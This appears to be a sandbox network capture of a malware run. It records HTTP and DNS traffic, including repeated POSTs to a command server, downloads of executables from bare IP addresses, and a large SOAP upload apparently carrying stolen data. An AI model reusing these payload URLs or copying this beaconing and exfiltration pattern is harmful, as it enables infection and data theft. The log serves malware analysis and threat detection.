accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 055CD9D2EB674E98BBA01A46A0CA4BE5 Ref B: AMS04EDGE3311 Ref C: 2023-10-10T17:35:20Z
date: Tue, 10 Oct 2023 17:35:19 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301365_1T2JA9OXDN9GY4HXW&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301365_1T2JA9OXDN9GY4HXW&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 408929
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B1D7C8C11B7C46FFBFB5944CF0170453 Ref B: AMS04EDGE3311 Ref C: 2023-10-10T17:35:20Z
date: Tue, 10 Oct 2023 17:35:19 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300951_1DEESSRWOJQZD4FVQ&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300951_1DEESSRWOJQZD4FVQ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 374984
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 88EFFB50F5C74EA5BE0594C1E46C00AC Ref B: AMS04EDGE3311 Ref C: 2023-10-10T17:35:20Z
date: Tue, 10 Oct 2023 17:35:20 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301384_1HQXQBTAMSF7ILYA2&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301384_1HQXQBTAMSF7ILYA2&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 455761
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B6AB8935DBB84F0D8F89805CA30F7C49 Ref B: AMS04EDGE3311 Ref C: 2023-10-10T17:35:21Z
date: Tue, 10 Oct 2023 17:35:20 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yhkivjyeq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 342
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jqdeutr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 282
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://atkncp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://khhuwdhgh.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 148
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xafxqb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 257
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://aofbgjfk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rxfka.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 240
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://imkpefssgq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 308
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uxnpjdp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 191
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fgbjewwsmr.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 157
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hgdlrlk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xussmxksnj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 239
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vnspgsiany.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 270
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lqjfcecn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 172
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=fICfoootEF1cVurEOC3T
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Oct 2023 17:35:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rinkas.exe

Explorer.EXE

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Oct 2023 17:35:25 GMT
Content-Type: application/octet-stream
Content-Length: 15877632
Last-Modified: Tue, 10 Oct 2023 16:08:19 GMT
Connection: keep-alive
ETag: "652576f3-f24600"
Accept-Ranges: bytes
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:35:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dkiydpawiv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 258
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vstfk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 146
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vlsty.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xkmjfsco.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 325
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bbtvx.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 120
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hwpfgckuj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 158
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eiskfvjjbk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 231
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://phivtfui.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 268
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://upykjq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eavcmsqsy.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 224
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rvetnrq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 133
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:35:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://185.216.70.222/trafico.exe

Explorer.EXE

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:35:42 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 10 Oct 2023 13:49:38 GMT
ETag: "6b400-6075cfa598c47"
Accept-Ranges: bytes
Content-Length: 439296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
POST

http://85.209.176.171/

C279.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 85.209.176.171
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
POST

http://85.209.176.171/

C279.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 85.209.176.171
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
POST

http://85.209.176.171/

C279.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 85.209.176.171
Content-Length: 3842843
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
DNS

C279.exe

Remote address:

85.209.176.171:80

Response

HTTP/1.1 100 Continue
DNS

C279.exe

Remote address:

85.209.176.171:80

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
DNS

142.9.123.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.9.123.176.in-addr.arpa

IN PTR

Response
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

learn.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

learn.microsoft.com

IN A

Response

learn.microsoft.com

IN CNAME

learn-public.trafficmanager.net

learn-public.trafficmanager.net

IN CNAME

learn.microsoft.com.edgekey.net

learn.microsoft.com.edgekey.net

IN CNAME

learn.microsoft.com.edgekey.net.globalredir.akadns.net

learn.microsoft.com.edgekey.net.globalredir.akadns.net

IN CNAME

e13636.dscb.akamaiedge.net

e13636.dscb.akamaiedge.net

IN A

104.85.2.139
GET

https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

content-length: 0
location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20231010T173552Z-vek62vzeqx0qvbtzsb4a65tvr40000000540000000012ncn
cache-control: no-cache, no-store
expires: Tue, 10 Oct 2023 17:35:52 GMT
date: Tue, 10 Oct 2023 17:35:52 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/html
content-encoding: gzip
